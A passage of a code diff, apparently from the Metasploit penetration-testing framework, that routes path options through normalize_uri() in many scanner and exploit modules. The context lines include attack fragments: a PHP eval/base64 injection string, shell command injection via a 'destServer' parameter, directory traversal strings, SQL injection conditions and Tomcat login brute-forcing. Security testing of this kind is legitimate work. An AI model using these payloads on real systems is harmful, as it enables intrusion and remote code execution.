|
|||
'~'
|
||||
]
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
|
||||
if tpath.eql? "/"||""
|
||||
print_error("Blank or default PATH set.");
|
||||
|
|
|
|||
|
|
@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
query.merge!(test_param)
|
||||
|
||||
resp = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => datastore['METHOD'] == 'POST' ? queryparse(datastore['QUERY'].to_s) : query,
|
||||
'method' => datastore['METHOD'],
|
||||
'ctype' => 'application/x-www-form-urlencoded',
|
||||
|
|
|
|||
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(target_host)
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
|
||||
t = "/.." * datastore['DEPTH']
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(target_host)
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -146,10 +146,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
data_parts << nil
|
||||
data = data_parts.join("\r\n")
|
||||
|
||||
vprint_status("Sending request #{datastore['PATH']}/#{v}#{n} to #{wmap_target_host}:#{datastore['RPORT']}")
|
||||
uri = normalize_uri(datastore['PATH'])
|
||||
vprint_status("Sending request #{uri}/#{v}#{n} to #{wmap_target_host}:#{datastore['RPORT']}")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['PATH'] + '/' + v + n,
|
||||
'uri' => uri + '/' + v + n,
|
||||
'method' => 'POST',
|
||||
'vhost' => vhost,
|
||||
'data' => data,
|
||||
|
|
|
|||
|
|
@ -49,7 +49,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
|||
|
|
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
ecode = nil
|
||||
emesg = nil
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -50,7 +50,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
@ -80,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'data' => post_data,
|
||||
}, 20)
|
||||
|
||||
|
|
|
|||
|
|
@ -72,18 +72,19 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
begin
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{datastore['URI']}",
|
||||
'uri' => uri,
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
http_fingerprint({ :response => res })
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
|
||||
vprint_error("http://#{rhost}:#{rport}#{uri} - #{e}")
|
||||
return
|
||||
end
|
||||
|
||||
if not res
|
||||
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - No response")
|
||||
vprint_error("http://#{rhost}:#{rport}#{uri} - No response")
|
||||
return
|
||||
end
|
||||
if res.code != 401
|
||||
|
|
@ -101,10 +102,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
success = false
|
||||
srvhdr = '?'
|
||||
user_pass = Rex::Text.encode_base64(user + ":" + pass)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{datastore['URI']}",
|
||||
'uri' => uri,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
|
|
@ -112,7 +113,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
}
|
||||
}, 25)
|
||||
unless (res.kind_of? Rex::Proto::Http::Response)
|
||||
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} not responding")
|
||||
vprint_error("http://#{rhost}:#{rport}#{uri} not responding")
|
||||
return :abort
|
||||
end
|
||||
return :abort if (res.code == 404)
|
||||
|
|
@ -126,12 +127,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} - #{e}")
|
||||
vprint_error("http://#{rhost}:#{rport}#{uri} - #{e}")
|
||||
return :abort
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("http://#{rhost}:#{rport}#{datastore['URI']} [#{srvhdr}] [Tomcat Application Manager] successful login '#{user}' : '#{pass}'")
|
||||
print_good("http://#{rhost}:#{rport}#{uri} [#{srvhdr}] [Tomcat Application Manager] successful login '#{user}' : '#{pass}'")
|
||||
report_auth_info(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
|
|
@ -146,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
return :next_user
|
||||
else
|
||||
vprint_error("http://#{rhost}:#{rport}#{datastore['URI']} [#{srvhdr}] [Tomcat Application Manager] failed to login as '#{user}'")
|
||||
vprint_error("http://#{rhost}:#{rport}#{uri} [#{srvhdr}] [Tomcat Application Manager] failed to login as '#{user}'")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run_host(target_host)
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
@uri = target_uri
|
||||
@uri = normalize_uri(target_uri)
|
||||
@uri.path << "/" if @uri.path[-1, 1] != "/"
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
|
|
|||
|
|
@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'method' => 'GET'
|
||||
}, 10)
|
||||
|
||||
|
|
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
verbs.each do |tv|
|
||||
resauth = send_request_raw({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'method' => tv
|
||||
}, 10)
|
||||
|
||||
|
|
|
|||
|
|
@ -80,7 +80,7 @@ require 'cgi'
|
|||
|
||||
begin
|
||||
noexistsres = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => tquery,
|
||||
'headers' => thead,
|
||||
'vhost' => randhost,
|
||||
|
|
@ -110,7 +110,7 @@ require 'cgi'
|
|||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'vars_get' => tquery,
|
||||
'headers' => thead,
|
||||
'vhost' => thost,
|
||||
|
|
|
|||
|
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
fname = File.basename(datastore['FILE'])
|
||||
traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
|
||||
uri = datastore['URIPATH'] + traversal + datastore['FILE']
|
||||
uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE']
|
||||
|
||||
print_status("#{rhost}:#{rport} - Requesting: #{uri}")
|
||||
|
||||
|
|
|
|||
|
|
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
conn = false
|
||||
usecode = datastore['ForceCode']
|
||||
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
|
|
|||
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'method' => 'PROPFIND',
|
||||
'data' => '',
|
||||
'ctype' => 'text/xml',
|
||||
|
|
|
|||
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'method' => 'OPTIONS'
|
||||
}, 10)
|
||||
|
||||
|
|
|
|||
|
|
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => normalize_uri(datastore['PATH']),
|
||||
'method' => 'PROPFIND',
|
||||
'data' => '',
|
||||
'ctype' => 'text/xml',
|
||||
|
|
|
|||
|
|
@ -49,7 +49,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
file = (datastore['FILE'][0,1] == '/') ? datastore['FILE'] : "/#{datastore['FILE']}"
|
||||
traverse = "../" * datastore['DEPTH']
|
||||
base = File.dirname("#{target_uri.path}/.")
|
||||
uri = normalize_uri(target_uri.path)
|
||||
base = File.dirname("#{uri}/.")
|
||||
|
||||
print_status("Requesting: #{file} - #{rhost}")
|
||||
res = send_request_cgi({
|
||||
|
|
|
|||
|
|
@ -45,7 +45,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def target_url
|
||||
"http://#{vhost}:#{rport}#{datastore['URI']}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
"http://#{vhost}:#{rport}#{uri}"
|
||||
end
|
||||
|
||||
|
||||
|
|
@ -106,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'data' => post_data,
|
||||
}, 20)
|
||||
|
||||
|
|
@ -162,7 +163,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'data' => post_data,
|
||||
}, 20)
|
||||
|
||||
|
|
|
|||
|
|
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
falsecond = "'%20and%20'#{rnum}'='#{rnum+1}"
|
||||
|
||||
hmeth = datastore['METHOD']
|
||||
tpath = datastore['PATH']
|
||||
tpath = normalize_uri(datastore['PATH'])
|
||||
prequery = datastore['PRE_QUERY']
|
||||
postquery = datastore['POST_QUERY']
|
||||
emesg = datastore['ERROR_MSG']
|
||||
|
|
|
|||
|
|
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
user = datastore['NOTES_USER'].to_s
|
||||
pass = datastore['NOTES_PASS'].to_s
|
||||
$uri = datastore['URI'].to_s
|
||||
$uri = normalize_uri(datastore['URI'])
|
||||
|
||||
if (user.length == 0 and pass.length == 0)
|
||||
print_status("http://#{vhost}:#{rport} - Lotus Domino - Trying dump password hashes without credentials")
|
||||
|
|
|
|||
|
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
|
||||
path = datastore['PATH']
|
||||
path = normalize_uri(datastore['PATH'])
|
||||
check1 = [
|
||||
'iNotes/Forms5.nsf',
|
||||
'iNotes/Forms6.nsf',
|
||||
|
|
|
|||
|
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
</env:Envelope>|
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'method' => 'POST',
|
||||
'agent' => 'VMware VI Client',
|
||||
'data' => soap_data,
|
||||
|
|
|
|||
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'method' => 'POST',
|
||||
'agent' => 'VMware VI Client',
|
||||
'data' => soap_data
|
||||
|
|
|
|||
|
|
@ -298,7 +298,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
opts = {
|
||||
'uri' => datastore['RURIPATH'],
|
||||
'uri' => normalize_uri(datastore['RURIPATH']),
|
||||
'method' => method,
|
||||
'version' => '1.1',
|
||||
}
|
||||
|
|
|
|||
|
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def brute_exploit(address)
|
||||
if not (@mercantec)
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI']
|
||||
'uri' => normalize_uri(datastore['URI'])
|
||||
}, 5)
|
||||
@mercantec = (res and res.body and res.body =~ /Copyright.*Mercantec/)
|
||||
fail_with(Exploit::Failure::NotFound, "The target is not a Mercantec CGI") if not @mercantec
|
||||
|
|
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying #{"%.8x" % address['Ret']}...")
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'],
|
||||
'uri' => normalize_uri(datastore['URI']),
|
||||
'query' => buffer
|
||||
}, 5)
|
||||
|
||||
|
|
|
|||
|
|
@ -60,9 +60,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => target_uri.path
|
||||
'uri' => uri
|
||||
})
|
||||
|
||||
if res and res.body =~ /Dolibarr 3\.1\.1/
|
||||
|
|
@ -113,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
@uri = target_uri
|
||||
@uri = normalize_uri(target_uri)
|
||||
@uri.path << "/" if @uri.path[-1, 1] != "/"
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
|
|
|||
|
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
|
|
|||
|
|
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
|
|
|||
|
|
@ -62,8 +62,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
res = send_request_raw({
|
||||
'uri' => target_uri.path,
|
||||
'uri' => uri,
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
|
|
@ -77,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
base = target_uri.path
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
@payload_name = "#{rand_text_alpha(5)}.php"
|
||||
|
|
|
|||
|
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
|
||||
res = send_request_raw({
|
||||
|
|
@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
|
||||
print_status("#{peer} - Housing php payload...")
|
||||
|
|
|
|||
|
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
|
|
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
|
|
|||
|
|
@ -55,13 +55,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
|
||||
login_path = "public/index.php?path_info=login&re_route=homepage"
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? login_path : "/#{login_path}"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? login_path : "/#{login_path}"
|
||||
|
||||
cms = send_request_raw({'uri' => uri}, 25)
|
||||
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/assets/modules/chat/' : '/public/assets/modules/chat/'
|
||||
|
||||
chat = send_request_raw({'uri' => uri}, 25)
|
||||
|
||||
|
|
@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
pass = datastore['PASS']
|
||||
p = Rex::Text.encode_base64(payload.encoded)
|
||||
header = rand_text_alpha_upper(3)
|
||||
login_uri = datastore['URI']
|
||||
login_uri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'
|
||||
login_uri = normalize_uri(datastore['URI'])
|
||||
login_uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php?path_info=login' : '/public/index.php?path_info=login'
|
||||
|
||||
# login
|
||||
res = send_request_cgi({
|
||||
|
|
@ -107,8 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# injection
|
||||
iuri = datastore['URI']
|
||||
iuri += (datastore['URI'][-1, 1] == "/") ? 'index.php' : '/index.php'
|
||||
iuri = normalize_uri(datastore['URI'])
|
||||
iuri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'index.php' : '/index.php'
|
||||
iuri << "?path_info=chat/add_message&async=1"
|
||||
phpkode = "{\${eval(base64_decode(\$_SERVER[HTTP_#{header}]))}}"
|
||||
injection = "<th>\");#{phpkode}</th>"
|
||||
|
|
@ -129,8 +129,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}
|
||||
}, 25)
|
||||
|
||||
euri = datastore['URI']
|
||||
euri += (datastore['URI'][-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
|
||||
euri = normalize_uri(datastore['URI'])
|
||||
euri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? 'public/index.php' : '/public/index.php'
|
||||
euri << "?path_info=/chat/history/1"
|
||||
|
||||
# execution
|
||||
|
|
|
|||
|
|
@ -57,12 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
target_uri.path << '/' if target_uri.path[-1,1] != '/'
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
clue = Rex::Text::rand_text_alpha(rand(5) + 5)
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
|
||||
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
|
||||
'vars_get' => {
|
||||
'destServer' => "||echo #{clue}"
|
||||
}
|
||||
|
|
@ -78,12 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
target_uri.path << '/' if target_uri.path[-1,1] != '/'
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if target_uri.path[-1,1] != '/'
|
||||
|
||||
# Trigger the command execution bug
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
|
||||
'uri' => "#{uri}plugins/access.ssh/checkInstall.php",
|
||||
'vars_get' =>
|
||||
{
|
||||
'destServer' => "||#{payload.encoded}"
|
||||
|
|
|
|||
|
|
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
|
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
|
|
|||
|
|
@ -56,8 +56,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def check
|
||||
target_uri.path << '/' if target_uri.path[-1,1] != '/'
|
||||
base = File.dirname("#{target_uri.path}.")
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
base = File.dirname("#{uri}.")
|
||||
|
||||
res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"})
|
||||
if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
|
||||
|
|
@ -106,8 +107,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
target_uri.path << '/' if target_uri.path[-1,1] != '/'
|
||||
base = File.dirname("#{target_uri.path}.")
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
base = File.dirname("#{uri}.")
|
||||
|
||||
php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
|
||||
|
||||
|
|
|
|||
|
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def check
|
||||
|
||||
base = target_uri.path
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
|
|
@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
|
|
|||
|
|
@ -57,8 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
|
||||
mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
|
||||
|
|
@ -75,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
uri = datastore['URI']
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (normalize_uri(datastore['URI'])[-1, 1] == "/") ? "dev/less.php" : "/dev/less.php"
|
||||
|
||||
start_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
end_mark = Rex::Text.rand_text_alpha(rand(5) + 5)
|
||||
|
|
|
|||
|
|
@ -54,15 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
# Make sure the URI begins with a slash
|
||||
uri = datastore['URI']
|
||||
if uri[0,1] != '/'
|
||||
uri = '/' + uri
|
||||
end
|
||||
|
||||
# Make sure the URI ends without a slash, because it's already part of the URI
|
||||
if uri[-1, 1] == '/'
|
||||
uri = uri[0, uri.length-1]
|
||||
end
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
|
||||
command = Rex::Text.uri_encode(payload.raw, 'hex-all')
|
||||
command.gsub!("%20","%2520")
|
||||
|
|
|
|||
|
|
@ -734,7 +734,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def my_target_host
|
||||
path = datastore['PATH']
|
||||
path = normalize_uri(datastore['PATH'])
|
||||
my_target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -59,15 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
# Make sure the URI begins with a slash
|
||||
uri = datastore['URI']
|
||||
if uri[0,1] != '/'
|
||||
uri = '/' + uri
|
||||
end
|
||||
|
||||
# Make sure the URI ends without a slash, because it's already part of the URI
|
||||
if uri[-1, 1] == '/'
|
||||
uri = uri[0, uri.length-1]
|
||||
end
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
|
||||
function = "passthru"
|
||||
key = Rex::Text.rand_text_alpha(6)
|
||||
|
|
|
|||
|
|
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
@uri = target_uri.path
|
||||
@uri = normalize_uri(target_uri.path)
|
||||
@uri << '/' if @uri[-1,1] != '/'
|
||||
|
||||
# Create user with empty credentials
|
||||
|
|
|
|||
|
|
@ -391,7 +391,7 @@ EOT
|
|||
end
|
||||
|
||||
def query_serverinfo
|
||||
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => path,
|
||||
|
|
@ -449,13 +449,13 @@ EOT
|
|||
if (datastore['VERB']== "POST")
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'data' => params
|
||||
})
|
||||
else
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor?' + params
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params
|
||||
}, 30)
|
||||
end
|
||||
res
|
||||
|
|
|
|||
|
|
@ -277,14 +277,14 @@ EOT
|
|||
if (datastore['VERB'] == "POST")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'method' => datastore['VERB'],
|
||||
'data' => data
|
||||
}, 5)
|
||||
else
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor?' + data,
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data,
|
||||
'method' => datastore['VERB'],
|
||||
}, 30)
|
||||
end
|
||||
|
|
@ -308,14 +308,14 @@ EOT
|
|||
if (datastore['VERB'] == "POST")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
